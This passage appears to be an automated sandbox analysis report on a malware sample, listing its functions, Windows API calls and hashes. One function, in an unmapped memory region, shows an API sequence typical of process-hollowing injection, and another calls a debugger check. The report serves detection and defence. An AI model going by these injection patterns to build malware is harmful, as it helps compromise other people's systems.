                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                    • String ID: X
                                                    • API String ID: 3777226403-3081909835
                                                    • Opcode ID: 11cca7e426d56530ef8958e8dbd579305025c97c6da3fc612235d7ac934e5e1f
                                                    • Instruction ID: 82c395145e73dd42aa8ffdca591ff76bf2a22413eca16a16f320b3df826e5814
                                                    • Opcode Fuzzy Hash: 11cca7e426d56530ef8958e8dbd579305025c97c6da3fc612235d7ac934e5e1f
                                                    • Instruction Fuzzy Hash: 2C21F670A102489BCB819F94D845BDE7BFEAF49701F008059E848A7281DFB4598DCFA5
                                                    Function 006B8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_memmove
                                                    • String ID: EA06
                                                    • API String ID: 1988441806-3962188686
                                                    • Opcode ID: 6131b89fcbf4018938681a0abbd6e5e5163940f5aca894fa37d1614b50b15b0e
                                                    • Instruction ID: 5158c015b82c1c3d8e7c63bb4aafcb391b9d4c43e2b167ecba1abc71b45346c9
                                                    • Opcode Fuzzy Hash: 6131b89fcbf4018938681a0abbd6e5e5163940f5aca894fa37d1614b50b15b0e
                                                    • Instruction Fuzzy Hash: 3D01F9718042187EDB58CBA8C816EEE7BFCDF11301F00419FF596D31C1E9B5A6048B60
                                                    Function 006B98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 006B98F8
                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 006B990F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Temp$FileNamePath
                                                    • String ID: aut
                                                    • API String ID: 3285503233-3010740371
                                                    • Opcode ID: 630748e8568eb44f844f97ded47f1dc337492357564295577b534334295975ca
                                                    • Instruction ID: 06bcd2d9b2531c5c5d17d7004d8a25083556aac619af009970d8873a8dab5de4
                                                    • Opcode Fuzzy Hash: 630748e8568eb44f844f97ded47f1dc337492357564295577b534334295975ca
                                                    • Instruction Fuzzy Hash: A6D05E7994130DABDB50DBE0DC0EFAA777CE704700F0042B2BA95911E1EAB096988B95
                                                    Function 006CCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b077f1b8c49e04c48c5a3052ddb422769f0fba9b4f1a4ac6cf47963c61ef70e
                                                    • Instruction ID: d32af92425e1480d68a28cee6a10929a11256350334c42c0e6f6cec70d760408
                                                    • Opcode Fuzzy Hash: 6b077f1b8c49e04c48c5a3052ddb422769f0fba9b4f1a4ac6cf47963c61ef70e
                                                    • Instruction Fuzzy Hash: 58F14A716083409FC754DF28C484A6ABBE6FF89324F14896EF89A9B351D730E945CF92
                                                    Function 0065434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00654370
                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00654415
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00654432
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_$_memset
                                                    • String ID:
                                                    • API String ID: 1505330794-0
                                                    • Opcode ID: 87bb6e9c25725c01e29536055ad052811ded973d3c24898c0cbd71ce08c518c4
                                                    • Instruction ID: 8d62707631603e4b0bd5f54c86ecc5b7dc3ba9f5f22a7c571b764ebb9bea823e
                                                    • Opcode Fuzzy Hash: 87bb6e9c25725c01e29536055ad052811ded973d3c24898c0cbd71ce08c518c4
                                                    • Instruction Fuzzy Hash: 0831A0B1505701CFC724DF24D8846DBBBF9FB48309F00496EE98A82291DB74A988CB56
                                                    Function 0067571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __FF_MSGBANNER.LIBCMT ref: 00675733
                                                      • Part of subcall function 0067A16B: __NMSG_WRITE.LIBCMT ref: 0067A192
                                                      • Part of subcall function 0067A16B: __NMSG_WRITE.LIBCMT ref: 0067A19C
                                                    • __NMSG_WRITE.LIBCMT ref: 0067573A
                                                      • Part of subcall function 0067A1C8: GetModuleFileNameW.KERNEL32(00000000,007133BA,00000104,?,00000001,00000000), ref: 0067A25A
                                                      • Part of subcall function 0067A1C8: ___crtMessageBoxW.LIBCMT ref: 0067A308
                                                      • Part of subcall function 0067309F: ___crtCorExitProcess.LIBCMT ref: 006730A5
                                                      • Part of subcall function 0067309F: ExitProcess.KERNEL32 ref: 006730AE
                                                      • Part of subcall function 00678B28: __getptd_noexit.LIBCMT ref: 00678B28
                                                    • RtlAllocateHeap.NTDLL(00E00000,00000000,00000001,00000000,?,?,?,00670DD3,?), ref: 0067575F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1372826849-0
                                                    • Opcode ID: a4eccdf441d3b818fe4e586813ce2b2f30a11f5199f5ec2312c3f8cb1bfaef1a
                                                    • Instruction ID: 672f995dc7040f0b4d3927401a436501a37bb2ef5f160c14c949129cf3b9a3e6
                                                    • Opcode Fuzzy Hash: a4eccdf441d3b818fe4e586813ce2b2f30a11f5199f5ec2312c3f8cb1bfaef1a
                                                    • Instruction Fuzzy Hash: A401F531240B11DEE6587778EC46AAE734B9B82762F10C169F40EEB3C1DFF49C414669
                                                    Function 006B98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,006B9548,?,?,?,?,?,00000004), ref: 006B98BB
                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,006B9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006B98D1
                                                    • CloseHandle.KERNEL32(00000000,?,006B9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006B98D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    • Opcode ID: 0fe9c937d7ba24e25e444c8e6da4b3ab0bcea3c823ed8acadf78e0438fd7702e
                                                    • Instruction ID: f9978b7f8bc20aee8aa26878b15cefe784ff58e8850f812532cc14a85d77c4aa
                                                    • Opcode Fuzzy Hash: 0fe9c937d7ba24e25e444c8e6da4b3ab0bcea3c823ed8acadf78e0438fd7702e
                                                    • Instruction Fuzzy Hash: 4DE08632581224B7D7211B54EC09FDA7F1AAF06760F114121FB15691E087B1161197D8
                                                    Function 006B8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 006B8D1B
                                                      • Part of subcall function 00672D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00679A24), ref: 00672D69
                                                      • Part of subcall function 00672D55: GetLastError.KERNEL32(00000000,?,00679A24), ref: 00672D7B
                                                    • _free.LIBCMT ref: 006B8D2C
                                                    • _free.LIBCMT ref: 006B8D3E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                    • Instruction ID: 690632bf4f0a53cf4f19f44888354fa2dcea06da304764f14889d2b8d733fb1a
                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                    • Instruction Fuzzy Hash: 63E012E16016024ACB74A679A950AD313DE8F98352714491EF40DD7286CE64FCC2C228
                                                    Function 0065A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CALL
                                                    • API String ID: 0-4196123274
                                                    • Opcode ID: 57c44fb8aaf1d7ac04ecef4180b3c8f6f389de5272a0bf1f1e5a50de5872f560
                                                    • Instruction ID: 4dfdbbf7761e822fb718a1a4dbcccf1b9acee576887e415747d224ee55ac6372
                                                    • Opcode Fuzzy Hash: 57c44fb8aaf1d7ac04ecef4180b3c8f6f389de5272a0bf1f1e5a50de5872f560
                                                    • Instruction Fuzzy Hash: F2226B70508341DFDB24DF54C494A6ABBE2FF84305F148A6DE88A8B361D731ED49CB96
                                                    Function 006547D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsThemeActive.UXTHEME ref: 00654834
                                                      • Part of subcall function 0067336C: __lock.LIBCMT ref: 00673372
                                                      • Part of subcall function 0067336C: DecodePointer.KERNEL32(00000001,?,00654849,006A7C74), ref: 0067337E
                                                      • Part of subcall function 0067336C: EncodePointer.KERNEL32(?,?,00654849,006A7C74), ref: 00673389
                                                      • Part of subcall function 006548FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00654915
                                                      • Part of subcall function 006548FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0065492A
                                                      • Part of subcall function 00653B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00653B68
                                                      • Part of subcall function 00653B3A: IsDebuggerPresent.KERNEL32 ref: 00653B7A
                                                      • Part of subcall function 00653B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,007152F8,007152E0,?,?), ref: 00653BEB
                                                      • Part of subcall function 00653B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00653C6F
                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00654874
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                    • String ID:
                                                    • API String ID: 1438897964-0
                                                    • Opcode ID: 144c1f4d18bb79995e3ba8bf69e0be527f61734a7ac6a3ed995542f3836f603b
                                                    • Instruction ID: 6eaf40f415ea615a6e2dfb0c15230d561f8005c60a36ee3fe61c5ffe732ae125
                                                    • Opcode Fuzzy Hash: 144c1f4d18bb79995e3ba8bf69e0be527f61734a7ac6a3ed995542f3836f603b
                                                    • Instruction Fuzzy Hash: 5111C071904351DFC700DF28E80594ABBE9FF98750F10C91EF845872B1DB748648CB99
                                                    Function 00655C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00655821,?,?,?,?), ref: 00655CC7
                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00655821,?,?,?,?), ref: 0068DD73
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 1aaedf6027eea360f34c56e5aa4b84552a142d4fe4a445e85b98c7d80a232144
                                                    • Instruction ID: bbb9573ef6c871f8ef756986f912763795d4f4e15e3c949a399faac7bc396d9a
                                                    • Opcode Fuzzy Hash: 1aaedf6027eea360f34c56e5aa4b84552a142d4fe4a445e85b98c7d80a232144
                                                    • Instruction Fuzzy Hash: 58019670184748BEF3201E24CC9AFB637DDEB01769F108319BEE69A2E0C6B41C498B54
                                                    Function 00670DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0067571C: __FF_MSGBANNER.LIBCMT ref: 00675733
                                                      • Part of subcall function 0067571C: __NMSG_WRITE.LIBCMT ref: 0067573A
                                                      • Part of subcall function 0067571C: RtlAllocateHeap.NTDLL(00E00000,00000000,00000001,00000000,?,?,?,00670DD3,?), ref: 0067575F
                                                    • std::exception::exception.LIBCMT ref: 00670DEC
                                                    • __CxxThrowException@8.LIBCMT ref: 00670E01
                                                      • Part of subcall function 0067859B: RaiseException.KERNEL32(?,?,?,00709E78,00000000,?,?,?,?,00670E06,?,00709E78,?,00000001), ref: 006785F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 3902256705-0
                                                    • Opcode ID: 1a204cad0852e8d1f3d41443636d8b25d5c6399ba527aa4fb23eee0a774c0f25
                                                    • Instruction ID: 9ce49b4616bd3e9327d34d382199a39c2b5c33f79987ad459d6297d2457496b5
                                                    • Opcode Fuzzy Hash: 1a204cad0852e8d1f3d41443636d8b25d5c6399ba527aa4fb23eee0a774c0f25
                                                    • Instruction Fuzzy Hash: 6FF0A97154031EA6DB20EA95DC155DF7BAF9F01311F108459F90C96281DFF09E5095E5
                                                    Function 006755FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __lock_file_memset
                                                    • String ID:
                                                    • API String ID: 26237723-0
                                                    • Opcode ID: d95e8d7329e8ff7d90d80dae49f30bf2c874eafc8ac23bed065b6ec7e811dd09
                                                    • Instruction ID: 4ecabebd159c9339c87e6b5ce4f1cf81ac0ca79deef8b4f40228f9049ae55aa5
                                                    • Opcode Fuzzy Hash: d95e8d7329e8ff7d90d80dae49f30bf2c874eafc8ac23bed065b6ec7e811dd09
                                                    • Instruction Fuzzy Hash: A401F771C00A09EFCF62AF688C064DE7B63AF91321F40C159F82C5B2A1DB718A11DF95
                                                    Function 006753A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00678B28: __getptd_noexit.LIBCMT ref: 00678B28
                                                    • __lock_file.LIBCMT ref: 006753EB
                                                      • Part of subcall function 00676C11: __lock.LIBCMT ref: 00676C34
                                                    • __fclose_nolock.LIBCMT ref: 006753F6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    • Opcode ID: 609dc75a92d7394ba19fbe7c26a61b048d9eb95a8b4aa20f3dabd16a8d564643
                                                    • Instruction ID: 9d909ef768dbc1168b547239dea216483c77321aa96cda962b009899bb07d3ea
                                                    • Opcode Fuzzy Hash: 609dc75a92d7394ba19fbe7c26a61b048d9eb95a8b4aa20f3dabd16a8d564643
                                                    • Instruction Fuzzy Hash: F5F09671800B049ED751AB7998057AD77E26F41374F20C24CA42DAB1D1EFFC4D415B59
                                                    Function 032D129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 032D1A5B
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 032D1AF1
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 032D1B13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                    • String ID:
                                                    • API String ID: 2438371351-0
                                                    • Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                    • Instruction ID: 3aceefd39997b56c50454dfaa152a5d8ff70a3d87d342f77a5c6d19c1c92a54b
                                                    • Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                    • Instruction Fuzzy Hash: BB12DE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A4E77A5F91CB5A
                                                    Function 00661FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ee97b539c5d9559412b2879bd17738f770cf935858750641b14ebac88ed1677
                                                    • Instruction ID: acefb1174474dbec54953167e19093b68636cfd36ce47b19ff688ec0c654570c
                                                    • Opcode Fuzzy Hash: 3ee97b539c5d9559412b2879bd17738f770cf935858750641b14ebac88ed1677
                                                    • Instruction Fuzzy Hash: F8518F31600604EFCF54EF68C9A5EAE77A7AF45310F1581ACF806AB392DA31ED05CB59
                                                    Function 00655AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00655B96
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
